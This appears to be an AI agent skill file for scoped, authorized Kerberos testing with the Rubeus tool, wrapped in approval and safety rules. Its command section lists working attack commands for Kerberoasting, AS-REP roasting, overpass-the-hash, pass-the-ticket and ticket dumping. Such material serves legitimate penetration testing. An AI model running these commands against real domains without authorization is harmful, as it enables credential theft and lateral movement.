--- name: rubeus description: 'Use for tightly scoped Kerberos ticket and account validation during authorized pentests. Trigger on approved ticket analysis, Kerberos exposure review, and proving whether a specific account or host permits unsafe ticket operations.' argument-hint: 'Domain, host or account scope, and validation goal' user-invocable: false --- # Rubeus ## Purpose Use this skill for narrowly scoped Kerberos ticket inspection or validation when the rules of engagement explicitly allow ticket-focused testing. ## Phase Fit - Primary: Vulnerability Analysis, Validation and Controlled Impact Demonstration - Secondary: Retest and Closure ## Use When - Need to review ticket posture, service tickets, or account exposure in Kerberos workflows. - Need to validate whether a specific account condition creates material ticket risk. - Need a repeatable retest after Kerberos hardening. ## Avoid When - Ticket collection or manipulation is not explicitly approved. - Domain or account boundaries are unclear. ## Inputs - Approved domain and account or host scope - Explicit ticket-handling approval boundaries - Stop conditions and evidence rules ## Procedure 1. Keep the scope limited to the approved account or host context. 2. Start with the least invasive ticket inspection that answers the question. 3. Escalate to deeper ticket validation only when explicitly approved. 4. Record only the minimum material proof needed. 5. Preserve the exact scope and command path for retest. ## Command Syntax Replace sample users and domains with approved in-scope values. ```cmd :: List and triage Kerberos tickets in memory Rubeus.exe triage Rubeus.exe klist :: Kerberoasting: request TGS hashes for offline cracking Rubeus.exe kerberoast /outfile:C:\temp\tgs.txt :: AS-REP Roasting: target pre-auth disabled accounts Rubeus.exe asreproast /outfile:C:\temp\asrep.txt :: Request TGT with password Rubeus.exe asktgt /user:auditor /password: /domain:contoso.com /dc:dc01.contoso.com :: Overpass-the-Hash: request TGT from NT hash Rubeus.exe asktgt /user:administrator /rc4: /domain:contoso.com /ptt :: Pass-the-Ticket: inject a ticket into the current session Rubeus.exe ptt /ticket: :: Dump all Kerberos tickets Rubeus.exe dump /nowrap ``` ## Evidence to Capture - Ticket or account conditions that materially change risk - Exact domain, host, or account scope used - Minimal proof path needed for remediation ## Safety Boundaries - Use only with explicit written approval. - Protect all ticket material as sensitive evidence.